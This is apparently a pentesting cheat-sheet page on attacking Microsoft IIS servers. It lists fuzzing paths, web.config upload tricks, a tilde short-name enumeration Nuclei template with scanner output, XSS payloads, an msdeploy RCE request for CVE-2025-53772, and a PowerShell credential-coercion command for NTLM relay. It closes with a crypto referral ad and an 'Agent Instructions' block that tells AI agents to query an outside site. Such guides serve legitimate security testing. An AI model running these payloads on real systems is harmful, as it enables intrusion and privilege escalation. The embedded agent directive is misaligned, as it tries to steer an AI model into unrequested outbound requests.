# IIS

## Fuzzing

```
/trace.axd
/trace.axd?id=1
/admin/help.cgi
/admin/help.cgi.bak
/admin/WS_FTP.LOG
/adovbs.inc
/confirm.asp.bak 
/default.asp.bak
/login.asp.bak
/pindex.asp.bak
/rootlogin.asp.bak
/rootlogin.asp.old
/_vti_pvt/service.cnf 
/include/common.inc
/WS_FTP.LOG
/service.cnf
/_vti_pvt/service.cnf
/aspnet_client
/global.asax
/msdeploy.axd
/msdeploy.axd <-- check CVE-2025-53772
```

Wordlists

{% embed url="<https://github.com/coffinxp/payloads/blob/main/iis.txt>" %}

{% embed url="<https://github.com/coffinxp/payloads/blob/main/aspx.txt>" %}

{% embed url="<https://github.com/reewardius/iis-pentest/tree/main>" %}

{% embed url="<https://github.com/nu11pointer/fuzzlists/blob/main/Discovery/iisfinal.txt>" %}

## trace.axd enable

Information leak

## Information disclosure

Try&#x20;

```
target.com/><img>
```

Often discloses info.

## PUT methode enabled

Try uploading .aspx webshell or web.config

## Insecure Upload File

Try to upload `web.config`

{% embed url="<https://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/>" %}

{% embed url="<https://soroush.me/blog/2019/08/uploading-web-config-for-fun-and-profit-2/>" %}

### Website using PHP

It is possible to use “***filename=”web<<“***” in the file upload request. If “web\*\*” replaces another file in the same directory (for example web.aspx), another combination can be used such as “***filename=”web<<>fig”***” or “***filename=’web”config’***”.

{% embed url="<https://soroush.me/blog/2014/07/file-upload-and-php-on-iis-wildcards/>" %}

## web.config or web.xml

```
https://x.x.x.x/.//WEB-INF/web.config
https://x.x.x.x/.//WEB-INF/web.xml
```

## Viewstate

{% embed url="<https://github.com/0xacb/viewgen>" %}

{% embed url="<https://notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net#PoC>" %}

## Internal IP disclosure

```
> curl -v --http1.0 http://example.com

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```

## Tilde Enumeration

```
http://example.com/~a
http://example.com/~b
http://example.com/~c
...
```

Assume the server contains a hidden directory named SecretDocuments. When a request is sent to `http://example.com/~s`, the server replies with a `200 OK` status code, revealing a directory with a short name beginning with "s"

```
http://example.com/~se
http://example.com/~sf
http://example.com/~sg
...
```

Once the short name `secret~1` is identified, enumeration of specific file names within that path can be performed, potentially exposing sensitive documents

```
http://example.com/secret~1/somefile.txt
http://example.com/secret~1/anotherfile.docx
```

The same IIS tilde directory enumeration technique can also detect 8.3 short file names for files within the directory.

```
http://example.com/secret~1/somefi~1.txt
```

&#x20;If two files named `somefile.txt` and `somefile1.txt` exist in the same directory, their 8.3 short file names would be:

* `somefi~1.txt` for `somefile.txt`
* `somefi~2.txt` for `somefile1.txt`

## **IIs Tilde Enumration Scanner - Burp Extension**

<figure><img src="/files/RxNElUBpi3zI2T7SRUno" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/O9bojMOFnvgSCWbJmzlH" alt=""><figcaption></figcaption></figure>

## **Nuclei Template**

<https://github.com/coffinxp/priv8-Nuclei/blob/main/iis.yaml>

```yaml
id: iis-shortname

info:
  name: iis-shortname
  author: coffin
  severity: low
  description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~.
  reference:
    - https://github.com/irsdl/IIS-ShortName-Scanner
    - https://github.com/lijiejie/IIS_shortname_Scanner
    - https://www.exploit-db.com/exploits/19525
  tags: iis

variables:
  randstring: "{{to_lower(rand_base(8))}}"

requests:
  - raw:

    - |
        GET /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        GET /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        OPTIONS /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        OPTIONS /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    - |
       DEBUG /{{randstring}}*~1*/a.aspx HTTP/1.1
       Host: {{Hostname}}
       Origin: {{BaseURL}}
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    - |
       DEBUG /*~1*/a.aspx HTTP/1.1
       Host: {{Hostname}}
       Origin: {{BaseURL}}
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 != 404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404 || status_code_5 != 404 && status_code_6 == 404"

```

## ShortScan

{% embed url="<https://github.com/bitquark/shortscan>" %}

```
shortscan http://yourtarget.com -F
```

## **IIS ShortName Scanner**

{% embed url="<https://github.com/irsdl/IIS-ShortName-Scanner>" %}

```shell-session
java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Do you want to use proxy [Y=Yes, Anything Else=No]? 
# IIS Short Name (8.3) Scanner version 2023.0 - scan initiated 2023/03/23 15:06:57
Target: http://10.129.204.231/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/
|_ Extra information:
  |_ Number of sent requests: 553
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ UPLOAD~1
  |_ Identified files: 3
    |_ CSASPX~1.CS
      |_ Actual extension = .CS
    |_ CSASPX~1.CS??
    |_ TRANSF~1.ASP
```

<figure><img src="/files/rsCI6THCXlHYsYApUYgn" alt=""><figcaption></figcaption></figure>

Upon executing the tool, it discovers 2 directories and 3 files. However, the target does not permit `GET` access to `http://10.129.204.231/TRANSF~1.ASP`, necessitating the brute-forcing of the remaining filename.

Or:

{% embed url="<https://github.com/lijiejie/IIS_shortname_Scanner>" %}

```
# python iis_shortname_scan.py http://target
```

### **Generate Wordlist**

```shell-session
egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > /tmp/list.txt
```

### Fuzzing

```shell-session
gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp
```

## XSS

```
http://domain.com/dossier/(Z("onerror="alert%601%60"))/file.aspx

http://domain.com/dossier/(Z("onerror="confirm%60Redirect%20Login%60"))/file.aspx
```

See XSS Page - ASP part

{% content-ref url="/pages/3ptIFDNOAiza85XhvHQO" %}
[XSS](/0xss0rz/pentest/web-attacks/xss.md)
{% endcontent-ref %}

## CVE-2025-53772 IIS WebDeploy RCE

```
/msdeploy.axd
```

{% embed url="<https://hawktrace.com/blog/cve-2025-53772>" %}

{% embed url="<https://gist.github.com/hawktrace/67836c7e9f35b72077b50f220349cd73>" %}

Sending this payload in an HTTP POST to /msdeploy.axd results in calc.exe launching on the server.

```
POST /msdeploy.axd HTTP/1.1
Host: msdeploy.webserver.com
MSDeploy.RequestId: 1
Content-Type: application/msdeploy
MSDeploy.Method: Sync
MSDeploy.SyncOptions: H4sIAAAAAAAAA...[Generated Payload]
Content-Length: 0
```

## Resources

{% embed url="<https://infosecwriteups.com/how-to-find-bugs-in-microsoft-iis-page-ef336a229abc>" %}

{% embed url="<https://medium.com/@far00t01/asp-net-microsoft-iis-pentesting-04571fb071a4>" %}

{% embed url="<https://pentestbook.six2dez.com/enumeration/webservices/iis>" %}

{% embed url="<https://github.com/reewardius/iis-pentest>" %}

## Script to configure IIS

{% embed url="<https://gist.github.com/kking124/7f34ca1f2b98c21753e3ecd8ecb86663>" %}

## Privilege Escalation

To get an HTTP coerce of the machine account

```
powershell iwr http://192.168.56.1 -UseDefaultCredentials
```

<figure><img src="/files/UBZvZ6kH1jsrTcKGCbtP" alt=""><figcaption></figcaption></figure>

than relay to Ldap and :

* start\_tls + add a computer to the domain + RBCD
  \
  or
* shadow credentials

Example with RBCD :

<figure><img src="/files/6RZJpiFlyX91SXx7M11C" alt=""><figcaption></figcaption></figure>

Shell as admin:

<figure><img src="/files/UCRgsUwvn88tzqG4Ev92" alt=""><figcaption></figcaption></figure>

Credit: [M4fly](https://x.com/M4yFly/status/1745581076846690811)

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="/files/a876wNYE568SJIfTZVxL" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/iis.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.